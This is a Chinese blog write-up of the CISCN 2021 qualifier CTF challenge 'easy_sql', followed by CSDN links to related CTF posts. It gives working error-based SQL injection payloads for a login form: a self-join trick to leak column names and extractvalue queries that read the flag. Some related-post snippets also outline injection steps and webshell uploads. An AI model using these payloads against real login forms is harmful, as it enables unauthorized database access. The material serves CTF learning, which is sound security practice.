[CISCN2021 Quals]easy_sql

最新推荐文章于 2024-06-18 09:47:40 发布
最新推荐文章于 2024-06-18 09:47:40 发布
阅读量582 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiangdie666/article/details/116997958
版权

easy_SQL

界面无回显,1’有回显1’'可以绕过。
抓包,sqlmap跑了一下,库security表users字段id,username,password.但没有用。
看了一下,是报错注入,手注了了一下。
首先看fuzz检测一下过滤了什么在这里插入图片描述
前四个都过滤掉了。
在这里插入图片描述
库名可以报错注入出来,但是由于from(information_schema.columns)where(table_name)被过滤了。
不能继续使用extractvalue爆表名字。换一种姿势。
无列名注入。
http://www.wupco.cn/?p=4117

uname=' and (select * from (select * from users as a join users as b) as c)or'&passwd=1&Submit=%E7%99%BB%E5%BD%95

在这里插入图片描述
原理是在使用别名的时候join把表扩充成两份,在最后别名c的时候查询到重复字段,就成功报错。并且我们输入错误的表名字也会提示我们错误。
在这里插入图片描述
于是我尝试了CISCN,ciscn_flag,ciscn,flags,flag_ciscn,flag。
flag成功回显。
在这里插入图片描述
使用using函数查看其他表。
在这里插入图片描述
直接使用报错函数读取字段即可。
但由于flag过长需要使用left和right函数分别查看。
这里说一下带有-并不是纯数字的字段名,`` 可以使用这个符号来查询。

payload:uname=' and (extractvalue(1,concat(0x7e,(select(left(`811262b2-2204-49d3-9994-68199fc5dc35`,30))from(flag)),0x7e)))or'&passwd=1&Submit=%E7%99%BB%E5%BD%95
payload:uname=' and (extractvalue(1,concat(0x7e,(select(right(`811262b2-2204-49d3-9994-68199fc5dc35`,30))from(flag)),0x7e)))or'&passwd=1&Submit=%E7%99%BB%E5%BD%95

在这里插入图片描述

jiangdie666
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ciscn_2021_pwny.zip
05-17
2021年全国大学生信息安全竞赛pwn题。
[CISCN2021 Quals]upload
jiangdie666的博客
05-18 2749
ciscn复现 学习自yu22x师傅博客 upload 这道题当天比赛,扫描后台发现了/example的页面,一共两篇源码,当时认为是利用example的源码,不适用index但是他题的意思是两个页面的源码都要利用起来,当天审计第一个页面的思路就是,先用ps创建一个图片大小为1*1的照片来过前两个检测,然后再修改照片里面的编码换成一句话木马,但是用于他有名字检测,所以没法继续进行。 学洗习了羽师傅的操作和想法,在buu上进行复现。 index.php <?php if (!isset($_GET["c
掌握数据处理新利器:Easy SQL
最新发布
gitblog_00022的博客
06-18 325
掌握数据处理新利器:Easy SQL 项目地址:https://gitcode.com/easysql/easy_sql 在大数据时代,数据提取(Extract)、转换(Transform)和加载(Load,简称ETL)是不可或缺的关键步骤。现在,有一个名为Easy SQL的开源项目,它旨在简化这个过程,让你以一种命令式的方式编写SQL进行ETL工作。基于标准SQL并添加了简单的新语法,你可以一步...
easy_sql
satasun的博客
04-19 557
easy_sql 判断注入类型(字符型注入/数字型输入) http://hwserver.bi0x.cn:8302/?id=1 and 1=1# 发现是数字型注入 判断字段数 http://hwserver.bi0x.cn:8302/?id=1 order by 3# 判断注入点 http://hwserver.bi0x.cn:8302/?id=0 union select 1,2,3# 1 2 3都是注入点 爆库名 http://hwserver.bi0x.cn:8302/?id=0 uni
[CISCN2021 Quals]upload(PNG-IDAT块嵌入马)
paidx0
09-17 473
[CISCN2021 Quals]upload(PNG-IDAT块嵌入马)
inno_ctf_2018_quals
05-16
InnoCTF 2018资格赛,任务和解决方案 所需的任务文件 按类别 网页 加密货币 竞价排名 TCP反向 重要时间 佩罗维奇克 :cross_mark: 你现在德威吗? 法证 现在接吻 :cross_mark: 点击它!... 去匿名化
Securinets CTF Quals 2021 Writeups.pdf
03-22
Securinets CTF Quals 2021 Writeups.pdf
【技术分享】借助DefCon Quals 2021的mooosl学习 .pdf
09-05
【技术分享】这篇内容主要介绍了如何借助DefCon Quals 2021的mooosl题目来学习安全领域的知识,特别是涉及到的漏洞挖掘、安全管理、安全分析和安全建设。mooosl是一个基于musl libc的挑战,通过分析其源码和功能,...
Stanford Quals 2008
02-03
Stanford Qualification exam questions 2008
CyBRICS CTF Quals 2019 Web 题解1
08-04
在CyBRICS CTF Quals 2019的Web挑战中,参赛者遇到了一系列涉及前端、后端以及加密解密的问题。以下是针对题目提供的部分解题思路和知识点的详细说明: 1. **Warmup**: - **URL重定向**:这个挑战中,网站最初...
CISCN2021_0解题目(filter)
anwen12的博客
05-21 745
CISCN2021_0解题目(filter) 0x01 题目初现 题目复现简单,压缩包解压 这里可以关闭debugweb\index.php 首先点开zip文件,这个不用多说 然后还有hint 再联想一下还和log文件有关,那个必定是larval rce那个漏洞相关了。那就不多说了,有兴趣的可以去看看 VNCTF2021 中的lar题目:https://blog.csdn.net/anwen12/article/details/115127075(这个挺详细 原cve分析:https://xz.a
CISCN 2021 题目复现
树木常青的博客
05-21 1530
前言 ciscn大概是自己学习网安以来参加的第一个比较正式的比赛吧,发现自己比想象的还菜,一个没做出来。。。还好赛后可以照着大佬们的wp复现,记录一下自己复现过程中的一些问题和收获(想复现的话建议直接跳转到文章结尾看羽师傅的文章)。(这只是菜鸡的一些学习记录,欢迎指出错误,大佬请略过) upload(buu复现) 1,用这个绕过getimagesize函数,第一次知道。 #define width 1 #define height 1 2,unicode配结合mb_strtolower()函数绕过,但不知
CISCN2021 西北赛区分区赛 Web xb_web_flask_trick
feng的博客
06-08 783
前言 6.5号去了兰州打了分区赛,4道Web出了web1和web4,web2和web3都不会。这题flask是web3,讲道理对我这种对flask不熟悉的弟弟来说还是挺难的,比赛的时候只有西电的一个队伍出了。今天晚上在学长的帮助下终于出了这道题,也是学到了很多的东西。 源码 import os from flask import Flask, request, abort, session app = Flask(__name__) app.config["SECRET_KEY"] = os.urand
easy_sql解析
qq_73722777的博客
03-08 432
获得列名,但是其中不包含flag项。先尝试打开username和password列查看数据。进入页面,我们看到网页标题为管理员后台,尝试使用万能密码进行登录。回显输入为3时可以正常登录,回显为4显示错误,推测回显位为3。登录后发现登录成功,网页有回显,尝试进行sql注入。网址回显错误,猜测空格被屏蔽,使用/**/代替尝试。获得表名为bighacker,users。爆数据后未发现flag,于是尝试从另一个表入手。获得库名为yunxi_exam,进行爆表名。获得flag,此题结束。得到列名,尝试爆数据。
图片二次渲染的绕过
soldi_er的博客
06-04 2089
文章目录二次渲染1.二次渲染函数labs-16_GIF二次渲染cicsn2021-upload2.png渲染绕过参考 二次渲染 1.二次渲染函数 labs-16_GIF二次渲染   (1)imagecreatefromgif($filename):resource,由Gif文件或 URL 创建一个新图象。 成功则返回一图像标识符/图像资源,失败则返回false。(PHP 4, PHP 5, PHP 7, PHP 8)   重点:该函数会对图像进行二次渲染,从而导致图片马的数据丢失,上传图片马失败。   (
CTF刷题第一周
qq_62660611的博客
11-10 1555
第一周刷题记录
CTF练习题
weixin_62707591的博客
05-08 926
Rabbit 序列密码是一种基于混沌理论的加密算法,它利用了混沌系统的随机性和不可预测性来保护数据的安全性。Rabbit 序列密码的安全性主要来自于混沌系统的随机性和不可预测性,使得攻击者无法通过破解算法或暴力破解的方式来获取密钥和明文。签名即标志着该文件是由支持 rar4.x 版本的软件压缩而成,如果使用支持 5.0 版本的压缩软件压缩,其签名可能会不同。要枚举的DBMS数据库表列(s)
攻防世界very_easy_sql
qq_45955869的博客
05-29 464
提示:攻防世界very_easy_sql提示:死记硬背记不住的内部网络时间盲注报错建议保存。
ASIS+Quals
10-18
ASIS是Ada语义接口规范,它是已发布的国际ISO标准(ISO / IEC 15291:...而Quals是一种基于ASIS的工具,它可以用于静态代码分析和漏洞检测。Quals可以帮助开发人员发现和修复代码中的安全漏洞,从而提高软件的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值